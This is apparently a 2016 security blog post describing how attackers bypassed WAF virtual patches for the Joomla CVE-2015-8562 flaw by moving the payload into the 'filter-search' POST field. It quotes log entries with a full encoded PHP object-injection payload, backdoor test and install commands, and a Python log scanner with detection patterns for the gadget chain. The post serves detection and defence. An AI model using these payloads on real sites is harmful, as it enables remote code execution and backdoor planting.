18 July 2016

Almost any WAF (Web Application Firewall) solution can be bypassed with sufficiently tricky and sophisticated techniques, or simply with a different attack vector. A blog post by Sucuri demonstrates this perfectly.

The short story: last year we became aware of a severe vulnerability in Joomla! (CVE-2015-8562), which led to remote PHP code execution. An exploit for this vulnerability was quickly released to the public following numerous website compromises. The vendor released a patch and many website owners installed it. Some of them, however, put too much faith in WAF technology and virtual patching instead of installing the actual patch. A virtual patch for this particular vulnerability was quickly implemented by WAF maintainers and everybody lived happily ever after until… a new attack vector was introduced.

The new approach uses a previously unknown vector: the “filter-search” parameter in the body of an HTTP POST request instead of the HTTP User-Agent header. This allowed attackers to bypass the WAF rules that had been put in place and successfully compromise websites that had not been updated. The new exploit looks like this in log files:

46.183.219.91 - - [19/Jun/2016:03:16:21 -0400] "POST /?option=com_tags HTTP/1.1" 403 4229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" "POSTLOG:filter-search=bigus%7D__hxsjcurrrt%7CO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A71%3A%22eval%28base64_decode%28%24_SERVER%5B%27HTTP_QGYSD%27%5D%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%3B%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7D\xF0\xFD\xFD\xFD"

According to Sucuri's investigation, the attackers injected the backdoor in June but did not use it until July. Below is an example of a test performed by the malicious actors to confirm that the backdoor had been installed successfully:

46.183.219.91 - - [01/Jul/2016:04:41:20 -0400] "POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" "POSTLOG:&php_func=assert&php=print%28%22MY_S%22.%22UCCESS%22%29%3B"

Backdoor installation:

46.183.219.91 - - [01/Jul/2016:09:35:27 -0400] "POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" "POSTLOG:&php_func=assert&php=assert%28base64_decode%28str_rot13%28%27MKMuoPuvLKAyAwEsMTIwo2EyXUA0py9lo3DkZltaHHEwnaO6rJukHR52EwWWAHDlqKyZZzqHpUb5nUSDIwqEETWOHUMSHxIVI0ySoGOgDzbjJRAgAQuQZ09vpR4jJSSRLauhFwIxFmWOnH1HFUEQEx5uD1IOq3O6rJckHR9zGRb1LKSXH2SAEmO2EacGZxkWDKqjraydpIOJqUSIrJcAEmO2pIEWAUSDBIuZF011FQWOoT5YGmOJqx9gpUcnBIM6qGOkIH42JJj5oR1XH2MjZ0I1pIE5oKSHrKqjoQIdpUb4nJ5uJzyZFwI1o1I5ZT5XDJ1M….”

We suggest that Joomla! website owners check their logs for the presence of the IP address 46.183.219.91, which is related to this incident.
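A log check of the kind suggested above, written as an added example for this post (not code from Sucuri or the Joomla! project): it parses combined-format Apache lines with the "POSTLOG:" body field, URL-decodes every client-controlled field rather than only User-Agent (which is why the filter-search variant slipped past the virtual patch), flags any PHP serialized object found there, and raises the severity when the gadget classes from CVE-2015-8562 appear. The sample log lines are constructed and shortened from the entries quoted in the post; the 203.0.113.x and 198.51.100.x addresses are documentation placeholders.

```python
import re
from urllib.parse import unquote_plus

# One Apache-style quoted field: anything but a quote, or a backslash-escaped char.
FIELD = r'(?:[^"\\]|\\.)*'
# Combined log format plus the "POSTLOG:" body field shown in the post's samples.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + FIELD + r')" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>' + FIELD + r')" "(?P<ua>' + FIELD + r')"'
    r'(?: "POSTLOG:(?P<post>' + FIELD + r')")?'
)
# Any PHP serialized object (O:<len>:"<class>":<n>:{) inside a request field is
# suspicious; the gadget classes used by CVE-2015-8562 make it a high-confidence hit.
SERIALIZED_OBJ = re.compile(r'O:\d+:"(?P<cls>[\w\\]+)":\d+:\{')
GADGET_CLASSES = {"JDatabaseDriverMysqli", "JDatabaseDriverMysql",
                  "JSimplepieFactory", "SimplePie"}
INCIDENT_IPS = {"46.183.219.91"}  # indicator named in the post

def inspect_line(line):
    """Return findings for one log line; an empty list means nothing was flagged."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # Check every client-controlled field, not just User-Agent: the bypass moved
    # the same payload into the POST body, which a UA-only WAF rule never inspects.
    for field in ("req", "ua", "post"):
        decoded = unquote_plus(m.group(field) or "").replace('\\"', '"')
        for obj in SERIALIZED_OBJ.finditer(decoded):
            cls = obj.group("cls")
            findings.append({"ip": m.group("ip"), "field": field, "class": cls,
                             "severity": "high" if cls in GADGET_CLASSES else "medium"})
    if m.group("ip") in INCIDENT_IPS:
        findings.append({"ip": m.group("ip"), "field": "ip", "class": None,
                         "severity": "ioc"})
    return findings

def scan(lines):
    """Flatten findings over a whole log."""
    return [f for line in lines for f in inspect_line(line)]

# Constructed sample log (shortened from the post's entries; not real traffic).
SAMPLE_LOG = [
    '46.183.219.91 - - [19/Jun/2016:03:16:21 -0400] "POST /?option=com_tags HTTP/1.1" 403 4229 "-" '
    '"Mozilla/5.0" "POSTLOG:filter-search=bigus%7D__hxs%7CO%3A21%3A%22JDatabaseDriverMysqli%22%3A3'
    '%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7D%7D"',
    # Original vector for the same flaw: the payload carried in the User-Agent header.
    '203.0.113.7 - - [20/Jun/2016:10:00:00 -0400] "GET / HTTP/1.1" 200 1234 "-" '
    '"}__t|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";O:17:\\"JSimplepieFactory\\":0:{}}"',
    # Benign search on the same endpoint; must not be flagged.
    '198.51.100.4 - - [20/Jun/2016:11:00:00 -0400] "POST /?option=com_tags HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0" "POSTLOG:filter-search=joomla+templates"',
]
```

Run `scan(SAMPLE_LOG)` against real access logs line by line; a "medium" hit on an unknown class name is still worth a look, since the same deserialization flaw can be reached through other gadget chains.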

We recommend installing the latest version of Joomla, 3.4.6 or higher, which fixes this vulnerability.